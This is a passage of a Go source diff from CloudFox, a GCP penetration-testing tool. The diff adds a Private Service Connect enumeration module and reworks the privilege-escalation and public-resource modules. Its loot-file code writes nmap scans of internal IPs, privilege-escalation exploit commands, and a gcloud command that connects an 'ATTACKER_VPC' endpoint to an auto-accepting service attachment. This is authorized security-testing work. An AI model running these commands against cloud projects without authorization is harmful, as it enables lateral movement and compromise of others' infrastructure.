globals.GCP_PERMISSIONS_MODULE_NAME) } output := PermissionsOutput{ @@ -1115,22 +698,38 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log Loot: lootFiles, } - // Build scopeNames using GetProjectName - scopeNames := make([]string, len(m.ProjectIDs)) - for i, projectID := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(projectID) + // Determine output scope - use org if available, otherwise fall back to project + var scopeType string + var scopeIdentifiers []string + var scopeNames []string + + if len(m.OrgIDs) > 0 { + scopeType = "organization" + for _, orgID := range m.OrgIDs { + scopeIdentifiers = append(scopeIdentifiers, orgID) + if name, ok := m.OrgNames[orgID]; ok && name != "" { + scopeNames = append(scopeNames, name) + } else { + scopeNames = append(scopeNames, orgID) + } + } + } else { + scopeType = "project" + scopeIdentifiers = m.ProjectIDs + for _, id := range m.ProjectIDs { + scopeNames = append(scopeNames, m.GetProjectName(id)) + } } - // Write output using HandleOutputSmart with scope support err := internal.HandleOutputSmart( "gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - scopeNames, // scopeNames + scopeType, + scopeIdentifiers, + scopeNames, m.Account, output, ) @@ -1139,12 +738,3 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log m.CommandCounter.Error++ } } - -// extractEmailFromEntity extracts the email portion from an entity string like "user:foo@example.com" -func extractEmailFromEntity(entity string) string { - parts := strings.SplitN(entity, ":", 2) - if len(parts) == 2 { - return parts[1] - } - return entity -} diff --git a/gcp/commands/privateserviceconnect.go b/gcp/commands/privateserviceconnect.go new file mode 100644 index 00000000..774a742d --- /dev/null +++ b/gcp/commands/privateserviceconnect.go @@ -0,0 +1,482 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + networkendpointsservice "github.com/BishopFox/cloudfox/gcp/services/networkEndpointsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPrivateServiceConnectCommand = &cobra.Command{ + Use: "private-service-connect", + Aliases: []string{"psc", "private-endpoints", "internal-endpoints"}, + Short: "Enumerate Private Service Connect endpoints and service attachments", + Long: `Enumerate Private Service Connect (PSC) endpoints, private connections, and service attachments. + +Private Service Connect allows private connectivity to Google APIs and services, +as well as to services hosted by other organizations. + +Security Relevance: +- PSC endpoints provide internal network paths to external services +- Service attachments expose internal services to other projects +- Private connections (VPC peering for managed services) provide access to Cloud SQL, etc. +- These can be used for lateral movement or data exfiltration + +What this module finds: +- PSC forwarding rules (consumer endpoints) +- Service attachments (producer endpoints) +- Private service connections (e.g., to Cloud SQL private IPs) +- Connection acceptance policies (auto vs manual) + +Output includes nmap commands for scanning internal endpoints.`, + Run: runGCPPrivateServiceConnectCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PrivateServiceConnectModule struct { + gcpinternal.BaseGCPModule + + PSCEndpoints []networkendpointsservice.PrivateServiceConnectEndpoint + PrivateConnections []networkendpointsservice.PrivateConnection + ServiceAttachments []networkendpointsservice.ServiceAttachment + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PrivateServiceConnectOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PrivateServiceConnectOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PrivateServiceConnectOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPrivateServiceConnectCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, "private-service-connect") + if err != nil { + return + } + + module := &PrivateServiceConnectModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + PSCEndpoints: []networkendpointsservice.PrivateServiceConnectEndpoint{}, + PrivateConnections: []networkendpointsservice.PrivateConnection{}, + ServiceAttachments: []networkendpointsservice.ServiceAttachment{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PrivateServiceConnectModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, "private-service-connect", m.processProject) + + totalFindings := len(m.PSCEndpoints) + len(m.PrivateConnections) + len(m.ServiceAttachments) + + if totalFindings == 0 { + logger.InfoM("No private service connect endpoints found", "private-service-connect") + return + } + + logger.SuccessM(fmt.Sprintf("Found %d PSC endpoint(s), %d private connection(s), %d service attachment(s)", + len(m.PSCEndpoints), len(m.PrivateConnections), len(m.ServiceAttachments)), "private-service-connect") + + // Count high-risk findings + autoAcceptCount := 0 + for _, sa := range m.ServiceAttachments { + if sa.ConnectionPreference == "ACCEPT_AUTOMATIC" { + autoAcceptCount++ + } + } + if autoAcceptCount > 0 { + logger.InfoM(fmt.Sprintf("[High] %d service attachment(s) auto-accept connections from any project", autoAcceptCount), "private-service-connect") + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *PrivateServiceConnectModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking private service connect in project: %s", projectID), "private-service-connect") + } + + svc := networkendpointsservice.New() + + // Get PSC endpoints + pscEndpoints, err := svc.GetPrivateServiceConnectEndpoints(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get PSC endpoints in project %s", projectID)) + } + + // Get private connections + privateConns, err := svc.GetPrivateConnections(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get private connections in project %s", projectID)) + } + + // Get service attachments + attachments, err := svc.GetServiceAttachments(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get service attachments in project %s", projectID)) + } + + m.mu.Lock() + m.PSCEndpoints = append(m.PSCEndpoints, pscEndpoints...) + m.PrivateConnections = append(m.PrivateConnections, privateConns...) + m.ServiceAttachments = append(m.ServiceAttachments, attachments...) + + for _, endpoint := range pscEndpoints { + m.addPSCEndpointToLoot(endpoint) + } + for _, conn := range privateConns { + m.addPrivateConnectionToLoot(conn) + } + for _, attachment := range attachments { + m.addServiceAttachmentToLoot(attachment) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PrivateServiceConnectModule) initializeLootFiles() { + m.LootMap["private-service-connect-commands"] = &internal.LootFile{ + Name: "private-service-connect-commands", + Contents: "# Private Service Connect Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n" + + "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n", + } +} + +func (m *PrivateServiceConnectModule) addPSCEndpointToLoot(endpoint networkendpointsservice.PrivateServiceConnectEndpoint) { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "## PSC Endpoint: %s (Project: %s, Region: %s)\n"+ + "# Network: %s, Subnet: %s\n"+ + "# Target Type: %s, Target: %s\n"+ + "# State: %s, IP: %s\n\n"+ + "# Describe forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --region=%s --project=%s\n\n", + endpoint.Name, endpoint.ProjectID, endpoint.Region, + endpoint.Network, endpoint.Subnetwork, + endpoint.TargetType, endpoint.Target, + endpoint.ConnectionState, endpoint.IPAddress, + endpoint.Name, endpoint.Region, endpoint.ProjectID, + ) + + if endpoint.IPAddress != "" { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "# Scan internal endpoint (from within VPC):\n"+ + "nmap -sV -Pn %s\n\n", + endpoint.IPAddress, + ) + } +} + +func (m *PrivateServiceConnectModule) addPrivateConnectionToLoot(conn networkendpointsservice.PrivateConnection) { + reservedRanges := "-" + if len(conn.ReservedRanges) > 0 { + reservedRanges = strings.Join(conn.ReservedRanges, ", ") + } + accessibleServices := "-" + if len(conn.AccessibleServices) > 0 { + accessibleServices = strings.Join(conn.AccessibleServices, ", ") + } + + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "## Private Connection: %s (Project: %s)\n"+ + "# Network: %s, Service: %s\n"+ + "# Peering: %s\n"+ + "# Reserved Ranges: %s\n"+ + "# Accessible Services: %s\n\n"+ + "# List private connections:\n"+ + "gcloud services vpc-peerings list --network=%s --project=%s\n\n", + conn.Name, conn.ProjectID, + conn.Network, conn.Service, + conn.PeeringName, + reservedRanges, + accessibleServices, + conn.Network, conn.ProjectID, + ) + + // Add nmap commands for each reserved range + for _, ipRange := range conn.ReservedRanges { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "# Scan private connection range (from within VPC):\n"+ + "nmap -sV -Pn %s\n\n", + ipRange, + ) + } +} + +func (m *PrivateServiceConnectModule) addServiceAttachmentToLoot(attachment networkendpointsservice.ServiceAttachment) { + natSubnets := "-" + if len(attachment.NatSubnets) > 0 { + natSubnets = strings.Join(attachment.NatSubnets, ", ") + } + + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "## Service Attachment: %s (Project: %s, Region: %s)\n"+ + "# Target Service: %s\n"+ + "# Connection Preference: %s\n"+ + "# Connected Endpoints: %d\n"+ + "# NAT Subnets: %s\n", + attachment.Name, attachment.ProjectID, attachment.Region, + attachment.TargetService, + attachment.ConnectionPreference, + attachment.ConnectedEndpoints, + natSubnets, + ) + + if len(attachment.ConsumerAcceptLists) > 0 { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf("# Accept List: %s\n", strings.Join(attachment.ConsumerAcceptLists, ", ")) + } + if len(attachment.ConsumerRejectLists) > 0 { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf("# Reject List: %s\n", strings.Join(attachment.ConsumerRejectLists, ", ")) + } + + // Add IAM bindings info + if len(attachment.IAMBindings) > 0 { + m.LootMap["private-service-connect-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range attachment.IAMBindings { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "\n# Describe service attachment:\n"+ + "gcloud compute service-attachments describe %s --region=%s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud compute service-attachments get-iam-policy %s --region=%s --project=%s\n\n", + attachment.Name, attachment.Region, attachment.ProjectID, + attachment.Name, attachment.Region, attachment.ProjectID, + ) + + // If auto-accept, add exploitation command + if attachment.ConnectionPreference == "ACCEPT_AUTOMATIC" { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "# [HIGH RISK] This service attachment accepts connections from ANY project!\n"+ + "# To connect from another project:\n"+ + "gcloud compute forwarding-rules create attacker-psc-endpoint \\\n"+ + " --region=%s \\\n"+ + " --network=ATTACKER_VPC \\\n"+ + " --address=RESERVED_IP \\\n"+ + " --target-service-attachment=projects/%s/regions/%s/serviceAttachments/%s\n\n", + attachment.Region, + attachment.ProjectID, attachment.Region, attachment.Name, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PrivateServiceConnectModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // PSC Endpoints table + if len(m.PSCEndpoints) > 0 { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Network", + "Subnet", + "IP Address", + "Target Type", + "Target", + "State", + } + var body [][]string + + for _, endpoint := range m.PSCEndpoints { + body = append(body, []string{ + m.GetProjectName(endpoint.ProjectID), + endpoint.ProjectID, + endpoint.Name, + endpoint.Region, + endpoint.Network, + endpoint.Subnetwork, + endpoint.IPAddress, + endpoint.TargetType, + endpoint.Target, + endpoint.ConnectionState, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "psc-endpoints", + Header: header, + Body: body, + }) + } + + // Private Connections table + if len(m.PrivateConnections) > 0 { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Network", + "Service", + "Peering Name", + "Reserved Ranges", + "Accessible Services", + } + var body [][]string + + for _, conn := range m.PrivateConnections { + reservedRanges := "-" + if len(conn.ReservedRanges) > 0 { + reservedRanges = strings.Join(conn.ReservedRanges, ", ") + } + accessibleServices := "-" + if len(conn.AccessibleServices) > 0 { + accessibleServices = strings.Join(conn.AccessibleServices, ", ") + } + + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.ProjectID, + conn.Name, + conn.Network, + conn.Service, + conn.PeeringName, + reservedRanges, + accessibleServices, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "private-connections", + Header: header, + Body: body, + }) + } + + // Service Attachments table - one row per IAM binding + if len(m.ServiceAttachments) > 0 { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Target Service", + "Accept Policy", + "Connected", + "NAT Subnets", + "IAM Role", + "IAM Member", + } + var body [][]string + + for _, attachment := range m.ServiceAttachments { + natSubnets := "-" + if len(attachment.NatSubnets) > 0 { + natSubnets = strings.Join(attachment.NatSubnets, ", ") + } + + if len(attachment.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range attachment.IAMBindings { + body = append(body, []string{ + m.GetProjectName(attachment.ProjectID), + attachment.ProjectID, + attachment.Name, + attachment.Region, + attachment.TargetService, + attachment.ConnectionPreference, + fmt.Sprintf("%d", attachment.ConnectedEndpoints), + natSubnets, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row with empty IAM columns + body = append(body, []string{ + m.GetProjectName(attachment.ProjectID), + attachment.ProjectID, + attachment.Name, + attachment.Region, + attachment.TargetService, + attachment.ConnectionPreference, + fmt.Sprintf("%d", attachment.ConnectedEndpoints), + natSubnets, + "-", + "-", + }) + } + } + + tables = append(tables, internal.TableFile{ + Name: "service-attachments", + Header: header, + Body: body, + }) + } + + // Collect loot files - only include if they have content beyond the header + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := PrivateServiceConnectOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "private-service-connect") + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go index f974cd95..f6b5a81b 100644 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -31,12 +31,7 @@ Detected privilege escalation methods include: - Cloud Build SA Abuse - GKE Cluster Access - Secret Manager Access -- Signed URL/JWT Generation - -Risk Levels: -- CRITICAL: Direct path to project/org compromise -- HIGH: Can escalate to privileged service account -- MEDIUM: Can access sensitive resources`, +- Signed URL/JWT Generation`, Run: runGCPPrivescCommand, } @@ -78,20 +73,7 @@ func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { return } - // Count by risk level - criticalCount := 0 - highCount := 0 - for _, path := range m.Paths { - switch path.RiskLevel { - case "CRITICAL": - criticalCount++ - case "HIGH": - highCount++ - } - } - - logger.SuccessM(fmt.Sprintf("Found %d privilege escalation path(s) (%d CRITICAL, %d HIGH)", - len(m.Paths), criticalCount, highCount), globals.GCP_PRIVESC_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d privilege escalation path(s)", len(m.Paths)), globals.GCP_PRIVESC_MODULE_NAME) m.writeOutput(ctx, logger) } @@ -118,167 +100,52 @@ func (m *PrivescModule) processProject(ctx context.Context, projectID string, lo } func (m *PrivescModule) initializeLootFiles() { - m.LootMap["privesc-paths"] = &internal.LootFile{ - Name: "privesc-paths", - Contents: "# GCP Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["privesc-commands"] = &internal.LootFile{ - Name: "privesc-commands", - Contents: "# GCP Privilege Escalation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["privesc-critical"] = &internal.LootFile{ - Name: "privesc-critical", - Contents: "# CRITICAL Privilege Escalation Paths\n# Generated by CloudFox\n# These require immediate attention\n\n", - } - m.LootMap["privesc-principals"] = &internal.LootFile{ - Name: "privesc-principals", - Contents: "", + m.LootMap["privesc-exploit-commands"] = &internal.LootFile{ + Name: "privesc-exploit-commands", + Contents: "# GCP Privilege Escalation Exploit Commands\n# Generated by CloudFox\n\n", } } func (m *PrivescModule) addPathToLoot(path privescservice.PrivescPath) { - // All paths - m.LootMap["privesc-paths"].Contents += fmt.Sprintf( - "## %s - %s\n"+ - "## Principal: %s (%s)\n"+ - "## Target: %s\n"+ - "## Risk: %s\n"+ - "## Permissions: %s\n"+ - "## Description: %s\n\n", - path.Method, path.ProjectID, + m.LootMap["privesc-exploit-commands"].Contents += fmt.Sprintf( + "# Method: %s\n"+ + "# Principal: %s (%s)\n"+ + "# Project: %s\n"+ + "# Target: %s\n"+ + "# Permissions: %s\n"+ + "%s\n\n", + path.Method, path.Principal, path.PrincipalType, + path.ProjectID, path.TargetResource, - path.RiskLevel, strings.Join(path.Permissions, ", "), - path.Description, - ) - - // Commands - m.LootMap["privesc-commands"].Contents += fmt.Sprintf( - "# %s - %s\n"+ - "# Principal: %s\n"+ - "# Risk: %s\n"+ - "%s\n\n", - path.Method, path.ProjectID, - path.Principal, - path.RiskLevel, path.ExploitCommand, ) - - // Critical only - if path.RiskLevel == "CRITICAL" { - m.LootMap["privesc-critical"].Contents += fmt.Sprintf( - "## [CRITICAL] %s\n"+ - "## Principal: %s (%s)\n"+ - "## Project: %s\n"+ - "## Target: %s\n"+ - "## Permissions: %s\n"+ - "## Description: %s\n"+ - "## Exploit:\n"+ - "## %s\n\n", - path.Method, - path.Principal, path.PrincipalType, - path.ProjectID, - path.TargetResource, - strings.Join(path.Permissions, ", "), - path.Description, - path.ExploitCommand, - ) - } - - // Unique principals - m.LootMap["privesc-principals"].Contents += path.Principal + "\n" } func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main privesc table + // Privesc table + // Reads: Source principal can perform action (method) on target resource header := []string{ - "Risk", - "Method", - "Principal", - "Type", - "Target", - "Permissions", "Project Name", - "Project", + "Project ID", + "Source Principal", + "Source Principal Type", + "Action (Method)", + "Target Resource", + "Permissions", } var body [][]string for _, path := range m.Paths { - perms := strings.Join(path.Permissions, ", ") - if len(perms) > 50 { - perms = perms[:50] + "..." - } - body = append(body, []string{ - path.RiskLevel, - path.Method, + m.GetProjectName(path.ProjectID), + path.ProjectID, path.Principal, path.PrincipalType, + path.Method, path.TargetResource, - perms, - m.GetProjectName(path.ProjectID), - path.ProjectID, - }) - } - - // Critical paths table - critHeader := []string{ - "Method", - "Principal", - "Target", - "Description", - "Exploit Command", - "Project Name", - "Project", - } - - var critBody [][]string - for _, path := range m.Paths { - if path.RiskLevel == "CRITICAL" { - cmd := path.ExploitCommand - if len(cmd) > 60 { - cmd = cmd[:60] + "..." - } - - critBody = append(critBody, []string{ - path.Method, - path.Principal, - path.TargetResource, - path.Description, - cmd, - m.GetProjectName(path.ProjectID), - path.ProjectID, - }) - } - } - - // By method summary - methodHeader := []string{ - "Method", - "Count", - "Critical", - "High", - "Medium", - } - - methodCounts := make(map[string]map[string]int) - for _, path := range m.Paths { - if methodCounts[path.Method] == nil { - methodCounts[path.Method] = make(map[string]int) - } - methodCounts[path.Method]["total"]++ - methodCounts[path.Method][path.RiskLevel]++ - } - - var methodBody [][]string - for method, counts := range methodCounts { - methodBody = append(methodBody, []string{ - method, - fmt.Sprintf("%d", counts["total"]), - fmt.Sprintf("%d", counts["CRITICAL"]), - fmt.Sprintf("%d", counts["HIGH"]), - fmt.Sprintf("%d", counts["MEDIUM"]), + strings.Join(path.Permissions, ", "), }) } @@ -290,28 +157,12 @@ func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) } } - tables := []internal.TableFile{ - { + tables := []internal.TableFile{} + if len(body) > 0 { + tables = append(tables, internal.TableFile{ Name: "privesc", Header: header, Body: body, - }, - } - - if len(critBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "privesc-critical", - Header: critHeader, - Body: critBody, - }) - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL privilege escalation paths!", len(critBody)), globals.GCP_PRIVESC_MODULE_NAME) - } - - if len(methodBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "privesc-summary", - Header: methodHeader, - Body: methodBody, }) } diff --git a/gcp/commands/publicresources.go b/gcp/commands/publicresources.go deleted file mode 100644 index 641f2beb..00000000 --- a/gcp/commands/publicresources.go +++ /dev/null @@ -1,352 +0,0 @@ -package commands - -import ( - "context" - "fmt" - "strings" - "sync" - - publicresourcesservice "github.com/BishopFox/cloudfox/gcp/services/publicResourcesService" - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/spf13/cobra" -) - -var GCPPublicResourcesCommand = &cobra.Command{ - Use: globals.GCP_PUBLICRESOURCES_MODULE_NAME, - Aliases: []string{"public", "exposed", "internet-facing"}, - Short: "Enumerate all internet-exposed resources", - Long: `Consolidate and enumerate all internet-exposed GCP resources. - -This module provides a single view of your attack surface by identifying -resources accessible from the internet across multiple services. - -Resources Scanned: -- Compute Engine instances with external IPs -- Cloud SQL instances with public IPs -- Cloud Run services with public ingress -- Cloud Functions with allUsers/allAuthenticatedUsers -- GKE clusters with public API endpoints -- Cloud Storage buckets with public access -- External load balancers - -Output: -- Consolidated table of all public resources -- Risk levels (CRITICAL, HIGH, MEDIUM, LOW) -- Access methods and exploitation commands -- Service account associations - -Use this for initial attack surface mapping during engagements.`, - Run: runGCPPublicResourcesCommand, -} - -// ------------------------------ -// Module Struct -// ------------------------------ -type PublicResourcesModule struct { - gcpinternal.BaseGCPModule - - Resources []publicresourcesservice.PublicResource - LootMap map[string]*internal.LootFile - mu sync.Mutex -} - -// ------------------------------ -// Output Struct -// ------------------------------ -type PublicResourcesOutput struct { - Table []internal.TableFile - Loot []internal.LootFile -} - -func (o PublicResourcesOutput) TableFiles() []internal.TableFile { return o.Table } -func (o PublicResourcesOutput) LootFiles() []internal.LootFile { return o.Loot } - -// ------------------------------ -// Command Entry Point -// ------------------------------ -func runGCPPublicResourcesCommand(cmd *cobra.Command, args []string) { - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PUBLICRESOURCES_MODULE_NAME) - if err != nil { - return - } - - module := &PublicResourcesModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Resources: []publicresourcesservice.PublicResource{}, - LootMap: make(map[string]*internal.LootFile), - } - - module.initializeLootFiles() - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) -} - -// ------------------------------ -// Module Execution -// ------------------------------ -func (m *PublicResourcesModule) Execute(ctx context.Context, logger internal.Logger) { - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PUBLICRESOURCES_MODULE_NAME, m.processProject) - - if len(m.Resources) == 0 { - logger.InfoM("No public resources found", globals.GCP_PUBLICRESOURCES_MODULE_NAME) - return - } - - // Count by risk level - criticalCount := 0 - highCount := 0 - for _, r := range m.Resources { - switch r.RiskLevel { - case "CRITICAL": - criticalCount++ - case "HIGH": - highCount++ - } - } - - logger.SuccessM(fmt.Sprintf("Found %d public resource(s)", len(m.Resources)), globals.GCP_PUBLICRESOURCES_MODULE_NAME) - if criticalCount > 0 || highCount > 0 { - logger.InfoM(fmt.Sprintf("[ATTACK SURFACE] %d CRITICAL, %d HIGH risk public resources!", criticalCount, highCount), globals.GCP_PUBLICRESOURCES_MODULE_NAME) - } - - m.writeOutput(ctx, logger) -} - -// ------------------------------ -// Project Processor -// ------------------------------ -func (m *PublicResourcesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Scanning public resources in project: %s", projectID), globals.GCP_PUBLICRESOURCES_MODULE_NAME) - } - - svc := publicresourcesservice.New() - resources, err := svc.EnumeratePublicResources(projectID) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICRESOURCES_MODULE_NAME, - fmt.Sprintf("Could not enumerate public resources in project %s", projectID)) - return - } - - m.mu.Lock() - m.Resources = append(m.Resources, resources...) - - for _, resource := range resources { - m.addResourceToLoot(resource) - } - m.mu.Unlock() - - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d public resource(s) in project %s", len(resources), projectID), globals.GCP_PUBLICRESOURCES_MODULE_NAME) - } -} - -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *PublicResourcesModule) initializeLootFiles() { - m.LootMap["public-resources-all"] = &internal.LootFile{ - Name: "public-resources-all", - Contents: "# All Public Resources\n# Generated by CloudFox\n\n", - } - m.LootMap["public-resources-critical"] = &internal.LootFile{ - Name: "public-resources-critical", - Contents: "# CRITICAL Risk Public Resources\n# Generated by CloudFox\n# These require immediate attention\n\n", - } - m.LootMap["public-resources-exploit"] = &internal.LootFile{ - Name: "public-resources-exploit", - Contents: "# Public Resource Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["public-endpoints"] = &internal.LootFile{ - Name: "public-endpoints", - Contents: "# Public Endpoints (for scanning)\n# Generated by CloudFox\n\n", - } -} - -func (m *PublicResourcesModule) addResourceToLoot(resource publicresourcesservice.PublicResource) { - // Add to all resources - m.LootMap["public-resources-all"].Contents += fmt.Sprintf( - "## [%s] %s: %s\n"+ - "## Project: %s, Location: %s\n"+ - "## Endpoint: %s\n"+ - "## Access: %s\n\n", - resource.RiskLevel, resource.ResourceType, resource.Name, - resource.ProjectID, resource.Location, - resource.PublicEndpoint, - resource.AccessLevel, - ) - - // Add critical resources separately - if resource.RiskLevel == "CRITICAL" { - m.LootMap["public-resources-critical"].Contents += fmt.Sprintf( - "## [CRITICAL] %s: %s\n"+ - "## Project: %s\n"+ - "## Endpoint: %s\n"+ - "## Access: %s\n"+ - "## Reasons:\n", - resource.ResourceType, resource.Name, - resource.ProjectID, - resource.PublicEndpoint, - resource.AccessLevel, - ) - for _, reason := range resource.RiskReasons { - m.LootMap["public-resources-critical"].Contents += fmt.Sprintf("## - %s\n", reason) - } - m.LootMap["public-resources-critical"].Contents += "\n" - } - - // Add exploit commands - if len(resource.ExploitCommands) > 0 { - m.LootMap["public-resources-exploit"].Contents += fmt.Sprintf( - "## [%s] %s: %s (%s)\n", - resource.RiskLevel, resource.ResourceType, resource.Name, resource.ProjectID, - ) - for _, cmd := range resource.ExploitCommands { - m.LootMap["public-resources-exploit"].Contents += cmd + "\n" - } - m.LootMap["public-resources-exploit"].Contents += "\n" - } - - // Add to endpoints list for scanning - if resource.PublicEndpoint != "" { - m.LootMap["public-endpoints"].Contents += resource.PublicEndpoint + "\n" - } -} - -// ------------------------------ -// Output Generation -// ------------------------------ -func (m *PublicResourcesModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main resources table - header := []string{ - "Risk", - "Type", - "Name", - "Endpoint", - "Port", - "Access Level", - "Service Account", - "Project Name", - "Project", - } - - var body [][]string - for _, resource := range m.Resources { - saDisplay := resource.ServiceAccount - if saDisplay != "" && len(saDisplay) > 30 { - parts := strings.Split(saDisplay, "@") - if len(parts) > 0 { - saDisplay = parts[0] + "@..." - } - } - if saDisplay == "" { - saDisplay = "-" - } - - endpoint := resource.PublicEndpoint - if len(endpoint) > 50 { - endpoint = endpoint[:50] + "..." - } - - body = append(body, []string{ - resource.RiskLevel, - resource.ResourceType, - resource.Name, - endpoint, - resource.Port, - resource.AccessLevel, - saDisplay, - m.GetProjectName(resource.ProjectID), - resource.ProjectID, - }) - } - - // By resource type table - typeHeader := []string{ - "Resource Type", - "Count", - "Critical", - "High", - } - - typeCounts := make(map[string]struct { - total int - critical int - high int - }) - - for _, resource := range m.Resources { - counts := typeCounts[resource.ResourceType] - counts.total++ - if resource.RiskLevel == "CRITICAL" { - counts.critical++ - } else if resource.RiskLevel == "HIGH" { - counts.high++ - } - typeCounts[resource.ResourceType] = counts - } - - var typeBody [][]string - for resourceType, counts := range typeCounts { - typeBody = append(typeBody, []string{ - resourceType, - fmt.Sprintf("%d", counts.total), - fmt.Sprintf("%d", counts.critical), - fmt.Sprintf("%d", counts.high), - }) - } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build tables - tables := []internal.TableFile{ - { - Name: "public-resources", - Header: header, - Body: body, - }, - } - - if len(typeBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "public-resources-summary", - Header: typeHeader, - Body: typeBody, - }) - } - - output := PublicResourcesOutput{ - Table: tables, - Loot: lootFiles, - } - - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - - err := internal.HandleOutputSmart( - 